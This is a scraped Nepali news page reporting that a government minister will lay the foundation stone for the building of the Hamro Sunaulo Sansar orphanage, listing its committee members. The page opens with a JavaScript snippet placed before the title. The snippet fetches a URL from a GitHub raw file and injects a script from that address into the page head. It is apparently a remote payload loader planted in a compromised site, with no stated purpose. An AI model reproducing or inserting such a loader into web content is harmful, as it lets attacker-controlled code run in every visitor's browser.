;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); महिला बालबालिका तथा जेष्ठ नागरिक मन्त्रीद्वारा हाम्रो सुनौलो संसारको भवन भोलि शिलान्यास हुदै – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • महिला बालबालिका तथा जेष्ठ नागरिक मन्त्रीद्वारा हाम्रो सुनौलो संसारको भवन भोलि शिलान्यास हुदै
गोकर्नेश्वोर बिशेष

महिला बालबालिका तथा जेष्ठ नागरिक मन्त्रीद्वारा हाम्रो सुनौलो संसारको भवन भोलि शिलान्यास हुदै

मंसिर ०९

काठमाडौँ । गोकर्नेश्वोर नगरपालिका वडा नं ६ मा रहेको हाम्रो सुनौलो संसार बालाश्रमको भवन भोलि कगेश्वोरी मनोहरा नगरपालिका वडा नं १ को गागलफेदीमा महिला बालबालिका तथा जेष्ठ नागरिक मंत्री माननीय लिलानाथ श्रेष्ठको हातबाट शिलान्यास हुने भएको छ |

आश्रमलाई थप मजबुद बनाउन र अझै देश भरि छरिएर रहेका आनाथ बालबालिकाहरुको निम्ति काम गर्ने उदेश्यले संस्थाको आफ्नै भवन निम्रण गर्न लागेको  हो |

आश्रमले २०७२ सालदेखि अनाथ, अशाहाय तथा बिपन्न बालबालिकाहरुलाई  पालनपोषण सहित  शिक्षा प्रदान गर्दै आएको छ | मेनुका कोइरालाको अध्यक्षमा स्थापित सो संस्थामा लक्ष्मी बस्नेत उपाध्यक्ष, सुबास बराइली सचिब, रोशनी कोइराला  कोषाध्यक्ष,  सहित ७ जनाको कार्यसमिति रहेको छ भने समाजसेवी  राजु सुनार  प्रमुख संरक्षक रहेका छन् |

फेसबुक प्रतिक्रियाहरु